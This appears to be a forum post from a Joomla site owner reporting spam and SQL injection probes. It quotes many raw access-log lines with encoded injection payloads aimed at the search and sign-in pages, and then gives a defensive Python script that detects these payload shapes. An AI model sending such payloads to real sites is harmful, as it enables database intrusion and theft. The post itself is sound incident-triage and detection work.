I already have huge attacks. I try to ban the bad IPs using the firewall, but it seems he has many IPs.
I think the problem is the Joomla header, which lets the bad guy know what it is and find the correct attack tools. I edited the code to remove that "generator", but it got wiped out on a new update.
<meta name="generator" content="Joomla! - Open Source Content Management" />
(1) I got 2 spam emails, even though I have Captcha on. I had my own simple spam verification on my contact page for years, and never got a single spam email. I simply generate two random numbers and ask the person to sum them (the numbers are shown inside images), such as 9 + 7 = ?
(2) Someone is attacking with SQL queries on the search page and sign-in page, such as:
194.61.25.18 - - [25/Sep/2021:01:54:19 -0500] "GET /insider-trading/\"%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4164=6508)%20THEN%20''%20ELSE%200x28%20END))--%20DAyx2016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:20 -0500] "GET /insider-trading/\"%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))--%20phWW2016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:20 -0500] "GET /insider-trading/)%20RLIKE%20(SELECT%20(CASE%20WHEN%20(8656=9419)%20THEN%20''%20ELSE%200x28%20END))%20AND%20(7416=74162016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:21 -0500] "GET /insider-trading/)%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))%20AND%20(1087=10872016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:22 -0500] "GET /insider-trading/))%20RLIKE%20(SELECT%20(CASE%20WHEN%20(1431=1548)%20THEN%20''%20ELSE%200x28%20END))%20AND%20((8396=83962016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:23 -0500] "GET /insider-trading/))%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))%20AND%20((8073=80732016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:23 -0500] "GET /insider-trading/)))%20RLIKE%20(SELECT%20(CASE%20WHEN%20(6195=8060)%20THEN%20''%20ELSE%200x28%20END))%20AND%20(((7613=76132016.htm HTTP/1.1" 500 5774 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:24 -0500] "GET /insider-trading/)))%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))%20AND%20(((5611=56112016.htm HTTP/1.1" 500 5774 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:25 -0500] "GET /insider-trading/%20RLIKE%20(SELECT%20(CASE%20WHEN%20(9782=6062)%20THEN%20''%20ELSE%200x28%20END))2016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:26 -0500] "GET /insider-trading/%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))2016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:26 -0500] "GET /insider-trading/')%20RLIKE%20(SELECT%20(CASE%20WHEN%20(6565=7780)%20THEN%20''%20ELSE%200x28%20END))%20AND%20('BHoJ'='BHoJ2016.htm HTTP/1.1" 500 6114 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:10:51:09 -0500] "POST /account/sign-in?task=user.login%29%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288819%3D8819%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%287934%3D7934 HTTP/1.1" 200 8632 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:09 -0500] "POST /account/sign-in?task=user.login%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288819%3D8819%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29 HTTP/1.1" 200 8621 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:10 -0500] "POST /account/sign-in?task=user.login%27%29%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288819%3D8819%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27DTym%27%3D%27DTym HTTP/1.1" 200 8632 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:11 -0500] "POST /account/sign-in?task=user.login%27%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288819%3D8819%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27haTS%27%3D%27haTS HTTP/1.1" 200 8632 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:12 -0500] "POST /account/sign-in?task=user.login%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288819%3D8819%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20hcJb HTTP/1.1" 200 8627 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:12 -0500] "POST /account/sign-in?task=user.login%29%20AND%207108%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%287108%3D7108%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%285878%3D5878 HTTP/1.1" 200 8643 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:13 -0500] "POST /account/sign-in?task=user.login%20AND%207108%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%287108%3D7108%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29 HTTP/1.1" 200 8632 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:14 -0500] "POST /account/sign-in?task=user.login%27%29%20AND%207108%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%287108%3D7108%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%28%27kMmu%27%3D%27kMmu HTTP/1.1" 200 8643 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
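
When the source rotates addresses, access logs like the ones above can be triaged by payload shape instead of by IP. The following is an added example, not part of the original post: it URL-decodes each request target, matches the RLIKE / CASE WHEN / CAST / CHAR patterns visible in the posted lines, and groups hits by endpoint and response status. The sample log lines, IP addresses and signature names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined log format; the request target may itself contain quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>.*) '
    r'HTTP/[\d.]+" (?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)

# Payload shapes seen in the posted log lines, matched after URL-decoding.
# The signature names are labels chosen for this example.
SIGNATURES = {
    "rlike_subselect": re.compile(r"\bRLIKE\s*\(\s*SELECT\b", re.I),
    "case_when_const": re.compile(r"\bCASE\s+WHEN\s*\(\s*\d+\s*=\s*\d+\s*\)", re.I),
    "cast_as_numeric": re.compile(r"\bCAST\s*\(.+\bAS\s+NUMERIC\b", re.I),
    "char_concat": re.compile(r"\bCHA?R\s*\(\s*\d+\s*\)\s*(?:\|\||\+)", re.I),
}

# Constructed sample lines (documentation IP ranges, shortened payloads).
SAMPLE = r"""
203.0.113.7 - - [25/Sep/2021:01:54:19 -0500] "GET /insider-trading/%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))2016.htm HTTP/1.1" 500 5872 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Sep/2021:01:54:20 -0500] "GET /insider-trading/)%20RLIKE%20(SELECT%20(CASE%20WHEN%20(8656=9419)%20THEN%20''%20ELSE%200x28%20END))%20AND%20(7416=74162016.htm HTTP/1.1" 500 5872 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Sep/2021:10:51:09 -0500] "POST /account/sign-in?task=user.login%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%29%20AS%20NUMERIC%29 HTTP/1.1" 200 8621 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Sep/2021:11:00:00 -0500] "GET /insider-trading/2016.htm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def scan(lines):
    """Return one hit per log line whose decoded target matches a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        target = unquote(m["target"])
        names = [n for n, rx in SIGNATURES.items() if rx.search(target)]
        if names:
            # Longest "clean" prefix of the target, i.e. the endpoint before the payload.
            endpoint = re.match(r"[\w/.-]*", target).group()
            hits.append({"ip": m["ip"], "endpoint": endpoint,
                         "status": int(m["status"]), "signatures": names})
    return hits

def summarize(hits):
    """Group by (endpoint, status) so rotating source IPs land in one bucket."""
    buckets = defaultdict(set)
    for h in hits:
        buckets[(h["endpoint"], h["status"])].add(h["ip"])
    return dict(buckets)

if __name__ == "__main__":
    for key, ips in summarize(scan(SAMPLE.strip().splitlines())).items():
        print(key, sorted(ips))
```

A bucket with status 500, like the search-page probes in the posted log, shows which endpoint is erroring on this input and is the first place to check input handling.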